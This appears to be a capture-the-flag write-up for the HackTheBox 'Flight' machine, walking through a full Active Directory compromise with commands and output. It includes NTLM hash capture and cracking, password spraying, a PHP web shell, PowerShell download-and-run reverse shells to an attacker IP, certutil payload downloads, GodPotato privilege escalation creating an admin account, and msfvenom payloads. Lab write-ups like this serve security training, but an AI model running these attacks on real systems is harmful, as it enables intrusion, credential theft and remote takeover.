WriteupsHTB — Flight
ADHardWindows
HTB — Flight
LFI via lang parameter captures NTLM hash with Responder. Password spray, IIS WebDAV shell upload, RunasCs for lateral movement to Domain Admin.
January 21, 2025HackTheBox
#AD#LFI#NTLM#WebDAV
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.187
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 22:40 EST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.01% done
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.34% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.74% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.08% done; ETC: 22:46 (0:06:05 remaining)
Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 22:42 (0:00:09 remaining)
Nmap scan report for 10.10.11.187
Host is up (0.022s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-22 10:41:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-22T10:42:45
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 19.16 ms 10.10.14.1
2 19.25 ms 10.10.11.187
80
sh
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACEdirsearch
sh
dirsearch -u http://10.10.11.187
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Flight/reports/http_10.10.11.187/_25-01-21_23-37-44.txt
Target: http://10.10.11.187/
[23:37:44] Starting:
...
[23:37:58] 403 - 301B - /cgi-bin/
[23:37:58] 200 - 2KB - /cgi-bin/printenv.pl
[23:38:00] 301 - 334B - /css -> http://10.10.11.187/css/
[23:38:04] 503 - 401B - /examples
[23:38:04] 503 - 401B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[23:38:04] 503 - 401B - /examples/jsp/index.html
445
sh
445/tcp open microsoft-ds?vhost fuzzing
sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://flight.htb/ -H 'Host: FUZZ.flight.htb' -fs 7069
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://flight.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.flight.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 7069
________________________________________________
school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 103ms]
:: Progress: [4989/4989] :: Job [1/1] :: 341 req/sec :: Duration: [0:00:06] :: Errors: 0 ::school.flight.htb
LFI
txt
?view=/windows/win.ini
- looking at this list
- https://github.com/DragonJAR/Security-Wordlist/blob/main/LFI-WordList-Windows
txt
c:/xampp/apache/logs/access.log
c:/xampp/apache/logs/error.log
c:/xampp/mysql/data/mysql-bin.index
c:/xampp/mysql/data/mysql.err
c:/xampp/mysql/data/{IPDELHOST}.err
c:/xampp/sendmail/sendmail.log
c:/xampp/apache/conf/httpd.conf
c:/xampp/FileZillaFTP/FileZilla Server.xml
c:/xampp/MercuryMail/mercury.ini
c:/xampp/php/php.ini
c:/xampp/phpMyAdmin/config.inc.php
c:/xampp/sendmail/sendmail.ini
c:/xampp/webalizer/webalizer.conf
c:/xampp/htdocs/aca.txt
c:/xampp/htdocs/admin.php
c:/xampp/htdocs/leer.txt
-
responder
sh
impacket-smbserver share -smb2support ./
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.187,50095)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:ef85d230...:0101000000000000000bf9688a6cdb01d369a972ef674504000000000100100045006f007a0079004e00740077004c000300100045006f007a0079004e00740077004c000200100065005200470072007600660051007500040010006500520047007200760066005100750007000800000bf9688a6cdb0106000400020000000800300030000000000000000000000000300000afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc400a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000hashcat
sh
hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt --force
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:ef85d230...:0101000000000000000bf9688a6cdb01d369a972ef674504000000000100100045006f007a0079004e00740077004c000300100045006f007a0079004e00740077004c000200100065005200470072007600660051007500040010006500520047007200760066005100750007000800000bf9688a6cdb0106000400020000000800300030000000000000000000000000300000afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc400a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000:S@Ss!K@*t13creds
svc_apache:S@Ss!K@*t13
sh
nxc smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13sh
nxc smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' --users
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.187 445 G0 Administrator 2022-09-22 20:17:02 0 Built-in account for administering the computer/domain
SMB 10.10.11.187 445 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.187 445 G0 krbtgt 2022-09-22 19:48:01 0 Key Distribution Center Service Account
SMB 10.10.11.187 445 G0 S.Moon 2022-09-22 20:08:22 0 Junion Web Developer
SMB 10.10.11.187 445 G0 R.Cold 2022-09-22 20:08:22 0 HR Assistant
SMB 10.10.11.187 445 G0 G.Lors 2022-09-22 20:08:22 0 Sales manager
SMB 10.10.11.187 445 G0 L.Kein 2022-09-22 20:08:22 0 Penetration tester
SMB 10.10.11.187 445 G0 M.Gold 2022-09-22 20:08:22 0 Sysadmin
SMB 10.10.11.187 445 G0 C.Bum 2022-09-22 20:08:22 0 Senior Web Developer
SMB 10.10.11.187 445 G0 W.Walker 2022-09-22 20:08:22 0 Payroll officer
SMB 10.10.11.187 445 G0 I.Francis 2022-09-22 20:08:22 0 Nobody knows why he's here
SMB 10.10.11.187 445 G0 D.Truff 2022-09-22 20:08:22 0 Project Manager
SMB 10.10.11.187 445 G0 V.Stevens 2022-09-22 20:08:22 0 Secretary
SMB 10.10.11.187 445 G0 svc_apache 2022-09-22 20:08:23 0 Service Apache web
SMB 10.10.11.187 445 G0 O.Possum 2022-09-22 20:08:23 0 Helpdesk
SMB 10.10.11.187 445 G0 [*] Enumerated 15 local users: flightpassword reuse
sh
nxc smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE creds
txt
S.Moon:S@Ss!K@*t13
svc_apache:S@Ss!K@*t13bloodhound
sh
sudo bloodhound-python -u 'S.Moon' -p 'S@Ss!K@*t13' -ns 10.10.11.187 -d flight.htb -c allsh
nxc smb 10.10.11.187 -u 's.moon' -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\s.moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ ntlm_theft.py
sh
wget https://raw.githubusercontent.com/Greenwolf/ntlm_theft/refs/heads/master/ntlm_theft.pysh
python3 ntlm_theft.py -g all -s 10.10.14.6 -f test
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Generation Complete.sh
smbclient //10.10.11.187/Shared -U 's.moon%S@Ss!K@*t13'- some files doesn't let you upload
- with try and error these 3 files gave ntlmv2 hash
sh
smb: \> dir
. D 0 Wed Jan 22 15:47:40 2025
.. D 0 Wed Jan 22 15:47:40 2025
desktop.ini A 46 Wed Jan 22 15:46:55 2025
test-(fulldocx).xml A 72584 Wed Jan 22 15:47:40 2025
test.application A 1649 Wed Jan 22 15:47:08 2025
5056511 blocks of size 4096. 1230393 blocks available
sh
impacket-smbserver share -smb2support ./
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.187,51544)
[*] AUTHENTICATE_MESSAGE (flight.htb\c.bum,G0)
[*] User G0\c.bum authenticated successfully
[*] c.bum::flight.htb:aaaaaaaaaaaaaaaa:63f14424...:010100000000000000007436d46cdb016b0cb74a0ee6ddf0000000000100100041006f00770052004f006100550075000300100041006f00770052004f006100550075000200100048004c006c0074007a005500630052000400100048004c006c0074007a005500630052000700080000007436d46cdb0106000400020000000800300030000000000000000000000000300000afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc400a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000hashcat
sh
hashcat -m 5600 c.bum_ntlmv2.txt /usr/share/wordlists/rockyou.txt
C.BUM::flight.htb:aaaaaaaaaaaaaaaa:63f14424...:010100000000000000007436d46cdb016b0cb74a0ee6ddf0000000000100100041006f00770052004f006100550075000300100041006f00770052004f006100550075000200100048004c006c0074007a005500630052000400100048004c006c0074007a005500630052000700080000007436d46cdb0106000400020000000800300030000000000000000000000000300000afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc400a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000:Tikkycoll_431012284creds
c.bum:Tikkycoll_431012284
sh
nxc smb 10.10.11.187 -u 'c.bum' -p 'Tikkycoll_431012284'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284 shell as svc_apache
sh
nxc smb 10.10.11.187 -u 'c.bum' -p 'Tikkycoll_431012284' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE sh
echo '<?php system($_GET[0]);?>' > shell.phpsh
smb: \flight.htb\> put shell.php sh
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6/powercat.ps1');powercat -c 10.10.14.6 -p 1234 -e cmd
powercat rev shell
sh
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.187] 51620
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\flight.htb>whomi
whomi
'whomi' is not recognized as an internal or external command,
operable program or batch file.
C:\xampp\htdocs\flight.htb>whoami
whoami
flight\svc_apachewinpeas
sh
C:\Users\svc_apache>certutil.exe -f -urlcache -split http://10.10.14.6/winPEASx64.exe winPEASx64.exelateral movement
sh
C:\Users\Public>certutil.exe -f -urlcache -split http://10.10.14.6/nc.exe nc.exesh
PS C:\users\svc_apache> certutil.exe -f -urlcache -split http://10.10.14.6/Invoke-RunasCs.ps1 Invoke-RunasCs.ps1sh
PS C:\users\svc_apache> Import-Module .\Invoke-RunasCs.ps1sh
PS C:\users\svc_apache> Invoke-RunasCs c.bum Tikkycoll_431012284 -ProcessTimeout 0 -Command "C:\Users\Public\nc.exe 10.10.14.6 1235 -e cmd"sh
nc -lvnp 1235
listening on [any] 1235 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.187] 52367
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bumuser.txt
sh
C:\Users\C.Bum\Desktop>type user.txt
type user.txt
24081470...sh
C:\inetpub>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1DF4-493D
Directory of C:\inetpub
01/22/2025 05:42 PM <DIR> .
01/22/2025 05:42 PM <DIR> ..
09/22/2022 11:24 AM <DIR> custerr
01/22/2025 05:42 PM <DIR> development
09/22/2022 12:08 PM <DIR> history
09/22/2022 11:32 AM <DIR> logs
09/22/2022 11:24 AM <DIR> temp
09/22/2022 11:28 AM <DIR> wwwroot
0 File(s) 0 bytes
8 Dir(s) 4,976,087,040 bytes free
C:\inetpub>cd deveopment
cd deveopment
The system cannot find the path specified.
C:\inetpub>cd development
cd development
C:\inetpub\development>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1DF4-493D
Directory of C:\inetpub\development
01/22/2025 05:42 PM <DIR> .
01/22/2025 05:42 PM <DIR> ..
04/16/2018 01:23 PM 9,371 contact.html
01/22/2025 05:42 PM <DIR> css
01/22/2025 05:42 PM <DIR> fonts
01/22/2025 05:42 PM <DIR> img
04/16/2018 01:23 PM 45,949 index.html
01/22/2025 05:42 PM <DIR> js
2 File(s) 55,320 bytes
6 Dir(s) 4,976,087,040 bytes free
sh
C:\inetpub\development>echo 'test'>test.txt
echo 'test'>test.txtsh
C:\inetpub\development>netstat -a
netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 g0:0 LISTENING
TCP 0.0.0.0:88 g0:0 LISTENING
TCP 0.0.0.0:135 g0:0 LISTENING
TCP 0.0.0.0:389 g0:0 LISTENING
TCP 0.0.0.0:443 g0:0 LISTENING
TCP 0.0.0.0:445 g0:0 LISTENING
TCP 0.0.0.0:464 g0:0 LISTENING
TCP 0.0.0.0:593 g0:0 LISTENING
TCP 0.0.0.0:636 g0:0 LISTENING
TCP 0.0.0.0:3268 g0:0 LISTENING
TCP 0.0.0.0:3269 g0:0 LISTENING
TCP 0.0.0.0:5985 g0:0 LISTENING
TCP 0.0.0.0:8000 g0:0 LISTENING
TCP 0.0.0.0:9389 g0:0 LISTENING
TCP 0.0.0.0:47001 g0:0 LISTENING
TCP 0.0.0.0:49664 g0:0 LISTENING
TCP 0.0.0.0:49665 g0:0 LISTENING
TCP 0.0.0.0:49666 g0:0 LISTENING
TCP 0.0.0.0:49667 g0:0 LISTENING
TCP 0.0.0.0:49673 g0:0 LISTENING
TCP 0.0.0.0:49674 g0:0 LISTENING
TCP 0.0.0.0:49682 g0:0 LISTENING
TCP 0.0.0.0:49693 g0:0 LISTENING
TCP 0.0.0.0:49705 g0:0 LISTENING
TCP 10.10.11.187:53 g0:0 LISTENING
port 8000 development
sh
C:\inetpub\development>curl http://127.0.0.1:8000
curl http://127.0.0.1:8000
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IIS 10.0 Detailed Error - 403.14 - Forbidden</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;}
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;}
.config_source code{font-size:.8em;color:#000000;}
pre{margin:0;font-size:1.4em;word-wrap:break-word;}
ul,ol{margin:10px 0 10px 5px;}
ul.first,ol.first{margin-top:5px;}
fieldset{padding:0 15px 10px 15px;word-break:break-all;}
.summary-container fieldset{padding-bottom:5px;margin-top:4px;}
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;}
legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px;
</head>
<body>
<div id="content">
<div class="content-container">
<h3>HTTP Error 403.14 - Forbidden</h3>
<h4>The Web server is configured to not list the contents of this directory.</h4>
</div>
<div class="content-container">
<fieldset><h4>Most likely causes:</h4>
</table>
</div>
<div id="details-right">
100 5069 100 5069 0 0 3183 0 0:00:01 0:00:01 --:--:-- 3186
ng="0">
<tr class="alt"><th>Requested URL</th><td> http://127.0.0.1:8000/</td></tr>
<tr><th>Physical Path</th><td> C:\inetpub\development</td></tr>
<tr class="alt"><th>Logon Method</th><td> Anonymous</td></tr>
<tr><th>Logon User</th><td> Anonymous</td></tr>
</table>
<div class="clear"></div>
</div>
</fieldset>
</div>
<div class="content-container">
<fieldset><h4>More Information:</h4>
This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server.
<p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,17763">View more information »</a></p>
</fieldset>
</div>
</div>
</body>
</html>
sh
C:\Users\C.Bum>certutil.exe -f -urlcache -split http://10.10.14.6/ligo-windows-agent.exe ligo-windows-agent.exesh
C:\Users\C.Bum>certutil.exe -f -urlcache -split http://10.10.14.6/winPEASx64.exe winPEASx64.exedevelopment folder
sh
C:\inetpub\development>icacls .\
icacls .\
.\ flight\C.Bum:(OI)(CI)(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)ligolo local port forwarding
sh
./ligo-linux-proxy -selfcertsh
sudo ip tuntap add user sake mode tun ligolo
sudo ip link set ligolo uppowershell
.\ligo-windows-agent.exe -connect 10.10.14.6:11601 -ignore-certsh
C:\Users\C.Bum>.\ligo-windows-agent.exe -connect 10.10.14.6:11601 -ignore-certsh
ligolo-ng » session
? Specify a session : 1 - #1 - flight\C.Bum@g0 - 10.10.11.187:53204
[Agent : flight\C.Bum@g0] » start
[Agent : flight\C.Bum@g0] » INFO[0280] Starting tunnel to flight\C.Bum@g0sh
ip route add 240.0.0.1/32 dev ligolosh
Invoke-RunasCs c.bum Tikkycoll_431012284 -ProcessTimeout 0 -Command "C:\Users\Public\nc.exe 10.10.14.6 1236 -e cmd"
- can write to this site
sh
C:\inetpub\development>echo 'test'>test.txt
echo 'test'>test.txt
- since it is in the
inetpubmight work withaspx, aspwebshell
sh
C:\inetpub\development>certutil.exe -f -urlcache -split http://10.10.14.6/cmdasp.aspx cmdasp.aspx
rev shell as iis
sh
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6/powercat.ps1');powercat -c 10.10.14.6 -p 1237 -e cmdsh
nc -lvnp 1237
listening on [any] 1237 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.187] 53317
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppoolsh
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledSeImpersonaetPrivilege
sh
certutil.exe -f -urlcache -split http://10.10.14.6/GodPotato-NET4.exe GodPotato-NET4.execmd
GodPotato-NET4.exe -cmd "C:\users\public\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.6 1238"cmd
GodPotato-NET4.exe -cmd "C:\users\public\nc.exe -t -e C:\Windows\System32\cmd.exe 127.0.0.1 1238"sh
GodPotato-NET4.exe -cmd "cmd /c whoami"sh
GodPotato-NET4.exe -cmd "cmd /c net user test Password123 /add && net localgroup administrators test /add"sh
nxc smb 10.10.11.187 -u test -p 'Password123'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\test:Password123 (Pwn3d!)root.xt
sh
C:\Users\Administrator\Desktop> type root.txt
38ff618c...sh
C:\Users\Public>certutil.exe -f -urlcache -split http://10.10.14.6/chisel.exe chisel.exesh
./chisel server --reverse --port 1234
2025/01/22 21:43:11 server: Reverse tunnelling enabled
2025/01/22 21:43:11 server: Fingerprint bjoUnkeFlkTVNUpqSkmx+skkpmWB3VRdMdxLC3dPTyI=
2025/01/22 21:43:11 server: Listening on http://0.0.0.0:1234cmd
.\chisel.exe client 10.10.14.6:1234 R:8000:127.0.0.1:8000cmd
GodPotato-NET4.exe -cmd "C:\users\public\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.6 80"sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o reverse.exesh
C:\Users\Public>certutil.exe -f -urlcache -split http://10.10.14.6/reverse.exe reverse.exesh
Up next
EasyJan 2025
HTB — Return
Network printer admin panel LDAP credential exfiltration via attacker-controlled server. Server Operators group membership for domain privilege escalation.
Read writeup
HardJan 2025
HTB — Blackfield
ASREPRoasting yields crackable hash. ForceChangePassword on account via BloodHound. Volatility lsass dump reveals backup operator for DCSync.
Read writeup
EasyJan 2025
HTB — Support
Custom .NET info collector binary contains obfuscated LDAP password. GenericAll on DC via Resource-Based Constrained Delegation for Domain Admin.
Read writeup